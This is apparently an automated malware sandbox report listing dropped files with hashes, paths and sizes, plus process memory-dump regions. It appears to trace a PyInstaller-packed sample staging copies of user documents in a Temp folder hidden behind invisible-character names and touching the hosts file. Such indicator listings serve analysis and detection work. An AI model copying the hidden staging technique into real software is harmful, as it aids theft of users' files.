00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20002\select.pyd

Filesize
25KB

MD5
fb70aece725218d4cba9ba9bbb779ccc

SHA1
bb251c1756e5bf228c7b60daea1e3b6e3f9f0ff5

SHA256
9d440a1b8a6a43cfaa83b9bc5c66a9a341893a285e02d25a36c4781f289c8617

SHA512
63e6db638911966a86f423da8e539fc4ab7eb7b3fb76c30c16c582ce550f922ad78d1a77fa0605caffa524e480969659bf98176f19d5effd1fc143b1b13bbaaf

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20002\sqlite3.dll

Filesize
643KB

MD5
21aea45d065ecfa10ab8232f15ac78cf

SHA1
6a754eb690ff3c7648dae32e323b3b9589a07af2

SHA256
a1a694b201976ea57d4376ae673daa21deb91f1bf799303b3a0c58455d5126e7

SHA512
d5c9dc37b509a3eafa1e7e6d78a4c1e12b5925b5340b09bee06c174d967977264c9eb45f146abed1b1fc8aa7c48f1e0d70d25786ed46849f5e7cc1c5d07ac536

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20002\unicodedata.pyd

Filesize
260KB

MD5
b2712b0dd79a9dafe60aa80265aa24c3

SHA1
347e5ad4629af4884959258e3893fde92eb3c97e

SHA256
b271bd656e045c1d130f171980ed34032ac7a281b8b5b6ac88e57dce12e7727a

SHA512
4dc7bd1c148a470a3b17fa0b936e3f5f68429d83d552f80051b0b88818aa88efc3fe41a2342713b7f0f2d701a080fb9d8ac4ff9be5782a6a0e81bd759f030922

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ilm10ngo.hsn.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tkbb4exi\tkbb4exi.dll

Filesize
4KB

MD5
fa77dac73f2511d5d4e9b260181f6588

SHA1
ed97021e41a9e4fa0a3c06609036662bda0bad87

SHA256
1f9c705fd5697c908ce0e4d804c493de59f774e9f384dc54213efb784be47240

SHA512
f4e2ec865ea4ade54e31467428d1a7a36e58efec2a174af4c35299864d7610089cb8c83a754df7cdd1fda4a9d01301ded56d8027ea446c9da53c52cc286b25ad

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎  ‏ \Common Files\Desktop\ConvertToOut.xlsx

Filesize
9KB

MD5
1e413c686c6ea82ea66f8660b32d6632

SHA1
a688d342e77390610d99784dc673ad31d4384c5b

SHA256
ac45eeca4ca0c3631d40d6ee1d554b14a93dd8702e7d2cf3c81cac2176aa78a8

SHA512
bda4d49a2b8151f6e7f2598aef1f120b7867a88e4c74dc946e8b39565f339dc48c2e2407564fea1ca3d4821c9bcf79871f4ada79e36cdde040d6efa046cde59b

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎  ‏ \Common Files\Desktop\DenyBackup.ocx

Filesize
235KB

MD5
70f762ea0add0347aad588b86bfd8b5d

SHA1
986b4a1bfb347849a1959576bcf4845ca2da2350

SHA256
c0f35d6c9d1721f1885e1863a0afc4839e3028bce794278dc05a1d6c938e3688

SHA512
3c93a82e94780d1177b63b00e2ed2fff137407ebdef679f5e1af6dd4025d9634f67b823e7115caf9cfba06b8c320dca257fcb6132fc9889728be4d203c373706

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎  ‏ \Common Files\Desktop\ExportPush.xlsx

Filesize
14KB

MD5
f853ee3b9813a0dc252adecfeccdb9a8

SHA1
78a41c32dbd052f7ad1d04e8a220e41c5daa559a

SHA256
5257ee5901db17cb7c77fa0bd6f0df9c182a5cc2b66f21dfc07d4090e0339b35

SHA512
29bec905ae137125c27259978af956e1170f0e1a43f23deedef6109b3156dbb4c48ad17231dffd517942f3ea761b30891f58cab7ef7a9847d11739ea173abece

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎  ‏ \Common Files\Desktop\FormatPublish.xlsx

Filesize
365KB

MD5
9c42e006e6bba5f7f95ba3de14cb031c

SHA1
0d066a03955a009eef1cb71d3d1294a6bbfd075a

SHA256
910a5422eb84b74edffdedf645f492c55aca2d493ad291348b0a08031726605a

SHA512
1b4078c7e82dea0324c4b00e52955327ecfeaec2807b5aef7b009ee02b91052357df80cc73a8c64ec88a276313628639e53668880edaf13c3c2e0deab8b05570

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎  ‏ \Common Files\Desktop\GroupResize.docx

Filesize
18KB

MD5
80400c4204b1f385df33269ba6a51aa0

SHA1
8171e21bd3f8deb437ae32785e839580e9212f9d

SHA256
a0fd0beaa3c8b9cbd5bdf03a625259c4543ce20c9f536b6fd87bae298e32d9bb

SHA512
de2ce004b9f3905248098e5ed049adff3d1e1e4c348b3bbe08d4427f71405572ca5bff9a6c06d85ff961c8f5b643697ab8dac355df5eacd1db85e9c2263002ae

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎  ‏ \Common Files\Desktop\RestartComplete.docx

Filesize
470KB

MD5
33e4cdb342f9009a2349330af744705d

SHA1
557556ba4d7b8345b3789df6041a67e0470cfbbb

SHA256
09a2c7eecc6892ad4996a42498b38307b89c9d62c648cad7803831e45e7a4352

SHA512
ca83c6c5caddcb7e8b598b7758e83cac4e419d72ee1b2c007f8ae35e8b32aa49b9a2b726c8cc03b4215474c3018dceb974e54e3e8d516ffe4adfce9e5499785b

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎  ‏ \Common Files\Documents\BackupUpdate.potx

Filesize
1.1MB

MD5
6e33e72cd18d5020884ba19a00624227

SHA1
1c76b2bac9a449698b265a2c38e6104c8372f8f6

SHA256
bc63f1db4901ef1442751a394c14fafac227954aed375a311f3403161518ba4d

SHA512
dec81d1326fade6b3c37dc976e5a42b776d742f559e8ed7f465f07b82e54ca5b045a55d3ab8beafa2bff4fc3fcd91707d706d70537fbe122b700b3fbbed87ae7

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎  ‏ \Common Files\Documents\PingRequest.docx

Filesize
13KB

MD5
e966e497ac135bd4a46bd97322a80f2c

SHA1
fae233e4258ca24b9871c92da3b52a87e96ea2e4

SHA256
a9b1bafb86259409b556678ad235d2ac73462371f58e69c0fcfa282a32f3c388

SHA512
ecc60aac346e52a4703919b361ecc88a7a770756724a0e33f840d685fdb5575fbd157e7546cc85ec3b4cc2118f51bfd300536818bbbeb0eb5bcc4764af401eed

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎  ‏ \Common Files\Documents\ReadShow.txt

Filesize
1.4MB

MD5
90756ebcaa88c54c20e5ca5d83d298e6

SHA1
efa1d53a9ada1d37060474c3fdc04e2f67517933

SHA256
ff65cdf246d0730877433c24c4d8a5114e55a6bc854164b05de121a962e1f791

SHA512
f543b36a536ec62da5320f1e2c11efdd5fca9690216980192ecd7d77fde8e9551bb70ccef73201b6618d5923eb110890195036e575f7d49426c5572274054f74

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎  ‏ \Common Files\Documents\RegisterInstall.docx

Filesize
16KB

MD5
a684f7c7a4648724ce29b7ba9c4e775a

SHA1
3146c0798e02cf908d928b327fddbf68c80932fb

SHA256
8e65474e52e6d81014627a0245ae281812db0fdb311fa51201f8cd2b59b38341

SHA512
5f099e2612d41cec95f954be085a86809f37e07affa99d203b97aba2ba9943e915091fb79cfd523f80157548873c6fd3ef3d529a9aad203e481ec1644507dc3c

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎  ‏ \Common Files\Downloads\RenameTrace.docx

Filesize
543KB

MD5
ae20af5d966d406d16cc7e533f6cd48d

SHA1
a6e8943a41dfe89091bc9ad4e3fcddce93d0a7c4

SHA256
557cdea2326adc78e706bbd928cc2559ed9dc211ba66ec3c570a25476a877367

SHA512
13ca2f9f882cc32455d48b7b56c14ee353654d1f4cef42cfe4301dec17b43ee8e28c825fedfca89e8d797d6c588bf3b3b6407ebf061ef4a1f645f32037cbee8e

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎  ‏ \Common Files\Downloads\SuspendCopy.mp3

Filesize
223KB

MD5
13c5c49576ce50da759c456d8447eeb4

SHA1
87c632e6a8fa4fcd9f97de8e7d75db0662a7bcb6

SHA256
6c04e3257bd1a98b86087698b3536d2cf2978adc0cadcada4c9762ec697733b8

SHA512
d01b164559292a5c8b15266c8cde97d0c4deaa6cd4ed550acc40c308319053a57fa9146e1a565bf45a2430a1e4741fd6eedfcb3f37a245c0f550e5d6bae3eb56

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\tkbb4exi\CSC94A94F22AD8F4C9EA1861E5B8F7FB63.TMP

Filesize
652B

MD5
17592dc063b4977e9ff56d8c176b0aaf

SHA1
d71bd1813e826e094f39774c34652e0b03d8893f

SHA256
01dfe75c08696fa6a9b2385d6303e3a34be50773662574c6c4e10184709f1b27

SHA512
c4e5b53aa30394cd903eb31105eae0349442b41c41382c06b81f4e226b1a86e3ae47b2c2916316556ab4438e4a833b30637c71335336e8813defff6ddacea7de

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\tkbb4exi\tkbb4exi.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\tkbb4exi\tkbb4exi.cmdline

Filesize
607B

MD5
166b1b6fd4f8fe20fc2f79c0b448683b

SHA1
9573fc57a959ad55690f5ca1579362f644fb6689

SHA256
491f63560502349947cec0d6073a1578035ff590f30969a9fa78bfc860333835

SHA512
08b3e8e02f4a442bb3b127941c8ae706cf9a3855e966f5e8cdb42554147e4906443dabb942d0d55dae1dcff87f217e67d5ce71f6676174199144148f1ec0e37f

Download Submit
memory/2032-101-0x0000011B745D0000-0x0000011B745F2000-memory.dmp

Filesize
136KB

Download
memory/2072-271-0x0000023E73930000-0x0000023E73938000-memory.dmp

Filesize
32KB

Download
memory/3664-32-0x00007FFF2E310000-0x00007FFF2E31F000-memory.dmp

Filesize
60KB

Download
memory/3664-121-0x00007FFF15350000-0x00007FFF154CF000-memory.dmp

Filesize
1.5MB

Download
memory/3664-214-0x00007FFF2AB40000-0x00007FFF2AB59000-memory.dmp

Filesize
100KB

Download
memory/3664-107-0x00007FFF23C40000-0x00007FFF23C65000-memory.dmp

Filesize
148KB

Download
memory/3664-81-0x00007FFF24290000-0x00007FFF242A9000-memory.dmp

Filesize
100KB

Download
memory/3664-82-0x00007FFF23DA0000-0x00007FFF23E53000-memory.dmp

Filesize
716KB

Download
memory/3664-78-0x00007FFF242B0000-0x00007FFF242DB000-memory.dmp

Filesize
172KB

Download
memory/3664-79-0x00007FFF283F0000-0x00007FFF283FD000-memory.dmp

Filesize
52KB

Download
memory/3664-76-0x00007FFF24090000-0x00007FFF240A4000-memory.dmp

Filesize
80KB

Download
memory/3664-70-0x00007FFF159C0000-0x00007FFF16023000-memory.dmp

Filesize
6.4MB

Download
memory/3664-71-0x00007FFF24910000-0x00007FFF24937000-memory.dmp

Filesize
156KB

Download
memory/3664-299-0x00007FFF24520000-0x00007FFF24554000-memory.dmp

Filesize
208KB

Download
memory/3664-302-0x000001B5DF220000-0x000001B5DF753000-memory.dmp

Filesize
5.2MB

Download
memory/3664-301-0x00007FFF23E60000-0x00007FFF23F2E000-memory.dmp

Filesize
824KB

Download
memory/3664-72-0x00007FFF23E60000-0x00007FFF23F2E000-memory.dmp

Filesize
824KB

Download
memory/3664-73-0x000001B5DF220000-0x000001B5DF753000-memory.dmp

Filesize
5.2MB

Download
memory/3664-74-0x00007FFF14E10000-0x00007FFF15343000-memory.dmp

Filesize
5.2MB

Download
memory/3664-66-0x00007FFF24520000-0x00007FFF24554000-memory.dmp

Filesize
208KB

Download
memory/3664-64-0x00007FFF28520000-0x00007FFF2852D000-memory.dmp

Filesize
52KB

Download
memory/3664-62-0x00007FFF2AB40000-0x00007FFF2AB59000-memory.dmp

Filesize
100KB

Download
memory/3664-60-0x00007FFF15350000-0x00007FFF154CF000-memory.dmp

Filesize
1.5MB

Download
memory/3664-58-0x00007FFF23C40000-0x00007FFF23C65000-memory.dmp

Filesize
148KB

Download
memory/3664-56-0x00007FFF24290000-0x00007FFF242A9000-memory.dmp

Filesize
100KB

Download
memory/3664-54-0x00007FFF242B0000-0x00007FFF242DB000-memory.dmp

Filesize
172KB

Download
memory/3664-30-0x00007FFF24910000-0x00007FFF24937000-memory.dmp

Filesize
156KB

Download
memory/3664-25-0x00007FFF159C0000-0x00007FFF16023000-memory.dmp

Filesize
6.4MB

Download
memory/3664-318-0x00007FFF14E10000-0x00007FFF15343000-memory.dmp

Filesize
5.2MB

Download
memory/3664-328-0x00007FFF24090000-0x00007FFF240A4000-memory.dmp

Filesize
80KB

Download
memory/3664-346-0x00007FFF15350000-0x00007FFF154CF000-memory.dmp

Filesize
1.5MB

Download
memory/3664-340-0x00007FFF159C0000-0x00007FFF16023000-memory.dmp

Filesize
6.4MB

Download
memory/3664-369-0x00007FFF23DA0000-0x00007FFF23E53000-memory.dmp

Filesize
716KB

Download
memory/3664-378-0x00007FFF28520000-0x00007FFF2852D000-memory.dmp

Filesize
52KB

Download
memory/3664-380-0x00007FFF23E60000-0x00007FFF23F2E000-memory.dmp

Filesize
824KB

Download
memory/3664-379-0x00007FFF24520000-0x00007FFF24554000-memory.dmp

Filesize
208KB

Download
memory/3664-377-0x00007FFF2AB40000-0x00007FFF2AB59000-memory.dmp

Filesize
100KB

Download
memory/3664-376-0x00007FFF15350000-0x00007FFF154CF000-memory.dmp

Filesize
1.5MB

Download
memory/3664-375-0x00007FFF23C40000-0x00007FFF23C65000-memory.dmp

Filesize
148KB

Download
memory/3664-374-0x00007FFF24290000-0x00007FFF242A9000-memory.dmp

Filesize
100KB

Download
memory/3664-373-0x00007FFF242B0000-0x00007FFF242DB000-memory.dmp

Filesize
172KB

Download
memory/3664-372-0x00007FFF24910000-0x00007FFF24937000-memory.dmp

Filesize
156KB

Download
memory/3664-371-0x00007FFF2E310000-0x00007FFF2E31F000-memory.dmp

Filesize
60KB

Download
memory/3664-370-0x00007FFF14E10000-0x00007FFF15343000-memory.dmp

Filesize
5.2MB

Download
memory/3664-355-0x00007FFF159C0000-0x00007FFF16023000-memory.dmp

Filesize
6.4MB

Download
memory/3664-368-0x00007FFF283F0000-0x00007FFF283FD000-memory.dmp

Filesize
52KB

Download
memory/3664-367-0x00007FFF24090000-0x00007FFF240A4000-memory.dmp

Filesize
80KB

Download